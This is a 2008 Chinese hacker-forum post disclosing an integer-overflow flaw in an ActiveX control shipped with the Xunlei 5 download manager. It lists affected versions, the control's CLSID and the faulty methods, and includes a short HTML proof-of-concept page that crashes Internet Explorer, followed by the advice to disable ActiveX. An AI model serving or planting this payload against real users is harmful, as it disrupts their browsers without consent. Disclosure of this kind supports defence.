硬件论坛 软件论坛 操作系统 编程论坛 黑客论坛 笔记本论坛 教程论坛 手机论坛 返回主站
娱乐论坛 小说论坛 女性论坛 游戏论坛 QQ论坛 美女图片论坛 视频在线 家园博客 收藏本站
‹‹ 上一主题 | 下一主题 ››
发新话题
打印

迅雷5 ThunderAgent Module 远程拒绝服务漏洞(0day)

查看作者资料 发送短消息 加为好友
QQ
荣誉勋章

Medal No.3 Medal No.2 Medal No.1 Meda No.5 Medal No.10

1# 发表于 2008-5-21 18:10  只看该作者
摘要:  迅雷是由Thunder Networking公司开发的一个下载软件,在中国有着非常广泛的用户。迅雷5的ThunderAgent_005.dll中注册了一个activex控件,当Internet Explorer调用他的某些方法时,将会造成整数溢出,成功利用将造成Internet Explorer崩溃。    影响版本:  迅雷5.5.2.252(已测试),
迅雷5.5.3.264(2006-12月最新版本已测试,受影响的dll变成ThunderAgent_007.dll)
其他版本可能也受影响    细节:  在ThunderAgent_005.dll中,有两处方法调用时忽略了输入参数异常的情况,当输入参数为精心构造的负数或大整数时,将造成整数溢出,产生不可预料的结果,从而造成浏览器崩溃。  该Activex注册控件的Object Classid是 {485463B7-8FB2-4B3B-B29B-8B919B0EACCE}
Method原型如下:  [id(0x00000006), helpstring("method GetInfoStruct")]
void GetInfoStruct([in] int pInfo);  
[id(0x00000007), helpstring("method GetTaskInfoStruct")]
void GetTaskInfoStruct([in] int pTaskInfo);    Codz:
POC:   ----------------------------------------------------------------------------------------
%26lt;html%26gt;
%26lt;head%26gt;
     
%26lt;script%26gt;
function AxisFun()
{       evil.GetTaskInfoStruct(0x7fffffff);   }
%26lt;/script%26gt;
%26lt;/head%26gt;   %26lt;OBJECT ID="evil" CLASSID="CLSID:{485463B7-8FB2-4B3B-B29B-8B919B0EACCE}"%26gt;%26lt;/OBJECT%26gt;   
%26lt;script%26gt;java script:AxisFun();%26lt;/script%26gt;   %26lt;/html%26gt;   ----------------------------------------------------------------------------------------
   
建议:  禁止ie执行activex

TOP

‹‹ 上一主题 | 下一主题 ››
发新话题
本论坛所有帖子仅代表发言者本人意见,不代表本站立场。